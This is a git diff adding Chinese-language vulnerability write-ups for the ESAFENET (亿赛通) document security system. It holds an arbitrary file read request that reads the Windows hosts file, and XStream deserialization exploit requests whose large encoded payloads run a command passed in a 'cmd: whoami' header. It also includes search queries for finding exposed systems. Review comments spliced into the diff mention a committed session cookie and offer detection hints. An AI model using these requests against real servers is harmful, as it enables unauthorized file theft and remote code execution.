CPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706606214283-97d9a1a2-6678-48b5-ac38-65b3e7ec3b66.png](./img/SycXQUY9DRCNi_Jk/1706606214283-97d9a1a2-6678-48b5-ac38-65b3e7ec3b66-057449.png) + + + +> 更新: 2024-04-20 22:01:32 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aaqgrkdlxyaxoaih> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞.md b/亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞.md new file mode 100644 index 0000000..136bbe0 --- /dev/null 
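Review bot: the UserLoginOutService1 reproduction is a 14756-byte opaque body consisting only of the letters A through P, with no statement of what encoding that is, what XStream object graph it decodes to, or how the `cmd: whoami` request header is consumed; a blob nobody can read cannot be audited by whoever merges it, so replace it with a description of the payload structure and keep only the endpoint, `Content-Type: text/xml` and the header on the page. The clientMessage write-up later in this commit repeats the same header set and a body that starts identically, so whatever is documented here should cover both. `Host: 192.168.110.187:8090` is a lab address and should be marked as a placeholder the way the other files leave `Host:` blank. The invariants a defender can use from what is visible are a `text/xml` POST to `/CDGServer3/UserLoginOutService1` carrying a non-standard `cmd` header and a body of this size.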
+++ b/亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞.md @@ -0,0 +1,33 @@ +# 亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞 + +# 一、漏洞简介 +亿赛通电子文档安全管理系统是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统ViewUploadFile存在任意文件读取漏洞。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/a1zbrpLQwGdJvau1/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-585164.png) + +# 四、漏洞复现 +```plain +GET /CDGServer3/client/;login;/DecryptApplication?command=ViewUploadFile&filePath=C:/Windows/System32/drivers/etc/hosts&uploadFileId=1&fileName1=hosts HTTP/1.1 +Host: +Cache-Control: max-age=0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Language: zh-CN,zh;q=0.9 +Cookie: JSESSIONID=5BEE0014C9CD691F3177A3194EB06C3F +Upgrade-Insecure-Requests: 1 +Accept-Encoding: gzip, deflate +``` + +![1705077242906-5bdd6d32-1859-451d-b680-246f8b50ac84.png](./img/a1zbrpLQwGdJvau1/1705077242906-5bdd6d32-1859-451d-b680-246f8b50ac84-884585.png) + + + +> 更新: 2024-04-20 22:01:30 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kgt5w16dogqflv5q> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统clientMessage存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统clientMessage存在xstream反序列化漏洞.md new file mode 100644 index 0000000..4b2c59d --- /dev/null +++ b/亿赛通电子文档安全管理系统clientMessage存在xstream反序列化漏洞.md 
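Review bot: the ViewUploadFile request commits a concrete session token, `Cookie: JSESSIONID=5BEE0014C9CD691F3177A3194EB06C3F`; even if it has long expired, captured credentials should not be checked in, so replace it with a placeholder (the `Host:` header on the same request is already left blank, so the convention exists). The write-up also does not say whether the request succeeds without that cookie, which matters for triage: the `;login;` segment in `/CDGServer3/client/;login;/DecryptApplication` looks like a path-parameter trick rather than a normal URL, and whether authentication is actually required changes the severity. For detection, look for `command=ViewUploadFile` combined with a `filePath=` that points outside the application's own directories (the example reads `C:/Windows/System32/drivers/etc/hosts`), and normalise `;`-delimited path parameters before matching on the servlet path.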
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统clientMessage存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统clientMessage存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/gYpaKKfdS_r9zElE/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-337685.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/clientMessage HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILN
GBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDB
DJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAH
IGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJ
KBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJ
LLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKN
MEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKC